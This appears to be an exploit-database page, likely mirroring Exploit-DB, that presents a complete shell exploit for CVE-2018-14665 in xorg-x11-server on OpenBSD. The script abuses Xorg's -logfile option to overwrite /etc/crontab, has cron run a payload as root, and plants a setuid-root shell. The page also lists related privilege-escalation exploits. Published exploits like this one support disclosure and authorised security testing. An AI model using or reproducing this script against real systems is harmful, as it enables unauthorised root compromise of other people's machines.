Search for hundreds of thousands of exploits

"xorg-x11-server 1.20.3 - Privilege Escalation"

Author

Exploit author

"Marco Ivaldi"

Platform

Exploit platform

openbsd

Release date

Exploit published date

2018-10-30

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
# Exploit Title: xorg-x11-server 1.20.3 - Privilege Escalation
# Date: 2018-10-27
# Exploit Author: Marco Ivaldi
# Vendor Homepage: https://www.x.org/
# Version: xorg-x11-server 1.19.0 - 1.20.2
# Tested on: OpenBSD 6.3 and 6.4
# CVE : CVE-2018-14665

# raptor_xorgasm

#!/bin/sh

#
# raptor_xorgasm - xorg-x11-server LPE via OpenBSD's cron
# Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission 
# check for -modulepath and -logfile options when starting Xorg. X server 
# allows unprivileged users with the ability to log in to the system via 
# physical console to escalate their privileges and run arbitrary code under 
# root privileges (CVE-2018-14665).
#
# This exploit targets OpenBSD's cron in order to escalate privileges to
# root on OpenBSD 6.3 and 6.4. You don't need to be connected to a physical
# console, it works perfectly on pseudo-terminals connected via SSH as well.
#
# See also:
# https://lists.x.org/archives/xorg-announce/2018-October/002927.html
# https://www.exploit-db.com/exploits/45697/
# https://gist.github.com/0x27/d8aae5de44ed385ff2a3d80196907850
#
# Usage:
# blobfish$ chmod +x raptor_xorgasm
# blobfish$ ./raptor_xorgasm
# [...]
# Be patient for a couple of minutes...
# [...]
# Don't forget to cleanup and run crontab -e to reload the crontab.
# -rw-r--r--  1 root  wheel  47327 Oct 27 14:48 /etc/crontab
# -rwsrwxrwx  1 root  wheel  7417 Oct 27 14:50 /usr/local/bin/pwned
# blobfish# id
# uid=0(root) gid=0(wheel) groups=1000(raptor), 0(wheel)
#
# Vulnerable platforms (setuid Xorg 1.19.0 - 1.20.2):
# OpenBSD 6.4 (Xorg 1.19.6) [tested]
# OpenBSD 6.3 (Xorg 1.19.6) [tested]
#

echo "raptor_xorgasm - xorg-x11-server LPE via OpenBSD's cron"
echo "Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>"

# prepare the payload
cat << EOF > /tmp/xorgasm
cp /bin/sh /usr/local/bin/pwned # fallback in case gcc is not available
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c
gcc /tmp/pwned.c -o /usr/local/bin/pwned # most dirs are mounted nosuid
chmod 4777 /usr/local/bin/pwned
EOF
chmod +x /tmp/xorgasm

# trigger the bug
cd /etc
Xorg -fp "* * * * * root /tmp/xorgasm" -logfile crontab :1 &
sleep 5
pkill Xorg

# run the setuid shell
echo
echo "Be patient for a couple of minutes..."
echo
sleep 120
echo
echo "Don't forget to cleanup and run crontab -e to reload the crontab."
ls -l /etc/crontab*
ls -l /usr/local/bin/pwned
/usr/local/bin/pwned
Release DateTitleTypePlatformAuthor
2020-02-26"OpenSMTPD < 6.6.3p1 - Local Privilege Escalation + Remote Code Execution"remoteopenbsd"Qualys Corporation"
2019-12-30"OpenBSD - Dynamic Loader chpass Privilege Escalation (Metasploit)"localopenbsdMetasploit
2019-12-16"OpenBSD 6.x - Dynamic Loader Privilege Escalation"localopenbsd"Qualys Corporation"
2018-11-30"xorg-x11-server < 1.20.3 - 'modulepath' Local Privilege Escalation"localopenbsd"Marco Ivaldi"
2018-10-30"xorg-x11-server 1.20.3 - Privilege Escalation"localopenbsd"Marco Ivaldi"
2017-06-28"OpenBSD - 'at Stack Clash' Local Privilege Escalation"localopenbsd"Qualys Corporation"
2017-02-07"OpenBSD HTTPd < 6.0 - Memory Exhaustion Denial of Service"dosopenbsdPierreKimSec
2009-04-14"OpenBSD 4.5 - IP datagram Null Pointer Deref Denial of Service"dosopenbsdnonroot
2009-04-13"OpenBSD 4.5 - IP datagrams Remote Denial of Service"dosopenbsdRembrandt
2008-07-01"OpenBSD 4.0 - 'vga' Local Privilege Escalation"localopenbsd"lul-disclosure inc."
Release DateTitleTypePlatformAuthor
2020-04-21"Oracle Solaris Common Desktop Environment 1.6 - Local Privilege Escalation"localsolaris"Marco Ivaldi"
2020-02-11"OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution"remotefreebsd"Marco Ivaldi"
2020-01-16"SunOS 5.10 Generic_147148-26 - Local Privilege Escalation"localmultiple"Marco Ivaldi"
2019-10-21"Solaris 11.4 - xscreensaver Privilege Escalation"localsolaris"Marco Ivaldi"
2019-10-16"Solaris xscreensaver 11.4 - Privilege Escalation"localsolaris"Marco Ivaldi"
2019-06-17"Exim 4.87 - 4.91 - Local Privilege Escalation"locallinux"Marco Ivaldi"
2019-05-20"Solaris 10 1/13 (Intel) - 'dtprintinfo' Local Privilege Escalation"localsolaris"Marco Ivaldi"
2019-05-20"Solaris 7/8/9 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2)"localsolaris"Marco Ivaldi"
2019-05-20"Solaris 7/8/9 (SPARC) - 'dtprintinfo' Local Privilege Escalation (1)"localsolaris"Marco Ivaldi"
2019-01-14"xorg-x11-server < 1.20.3 - Local Privilege Escalation (Solaris 11 inittab)"localsolaris"Marco Ivaldi"
2018-11-30"xorg-x11-server < 1.20.3 - 'modulepath' Local Privilege Escalation"localopenbsd"Marco Ivaldi"
2018-10-30"xorg-x11-server 1.20.3 - Privilege Escalation"localopenbsd"Marco Ivaldi"
2009-09-11"IBM AIX 5.6/6.1 - '_LIB_INIT_DBG' Arbitrary File Overwrite via Libc Debug"localaix"Marco Ivaldi"
2008-03-10"Solaris 8/9/10 - 'fifofs I_PEEK' Local Kernel Memory Leak"localsolaris"Marco Ivaldi"
2007-04-04"TrueCrypt 4.3 - 'setuid' Local Privilege Escalation"localwindows"Marco Ivaldi"
2007-02-13"Portable OpenSSH 3.6.1p-PAM/4.1-SuSE - Timing Attack"remotemultiple"Marco Ivaldi"
2007-02-13"Lotus Domino R6 Webmail - Remote Password Hash Dumper"remotewindows"Marco Ivaldi"
2007-02-06"MySQL 4.x/5.0 (Windows) - User-Defined Function Command Execution"remotewindows"Marco Ivaldi"
2006-12-19"Oracle 9i/10g - 'extproc' Local/Remote Command Execution"remotemultiple"Marco Ivaldi"
2006-12-19"Oracle 9i/10g - 'utl_file' FileSystem Access"remotelinux"Marco Ivaldi"
2006-11-23"Oracle 9i/10g - 'read/write/execute' ation Suite"remotemultiple"Marco Ivaldi"
2006-10-24"Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation (2)"localsolaris"Marco Ivaldi"
2006-10-24"Solaris 10 libnspr - 'Constructor' Arbitrary File Creation Privilege Escalation (3)"localsolaris"Marco Ivaldi"
2006-10-16"Solaris 10 libnspr - 'LD_PRELOAD' Arbitrary File Creation Privilege Escalation (2)"localsolaris"Marco Ivaldi"
2006-10-13"Solaris 10 libnspr - 'LD_PRELOAD' Arbitrary File Creation Privilege Escalation (1)"localsolaris"Marco Ivaldi"
2006-10-13"Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation (1)"localsolaris"Marco Ivaldi"
2006-09-13"X11R6 < 6.4 XKEYBOARD (Solaris/SPARC) - Local Buffer Overflow (2)"localsolaris"Marco Ivaldi"
2006-08-22"Solaris 10 sysinfo(2) - Local Kernel Memory Disclosure (2)"localsolaris"Marco Ivaldi"
2006-08-22"Solaris 8/9 - '/usr/ucb/ps' Local Information Leak"localsolaris"Marco Ivaldi"
2006-07-18"Linux Kernel 2.6.13 < 2.6.17.4 - 'logrotate prctl()' Local Privilege Escalation"locallinux"Marco Ivaldi"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/45742/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.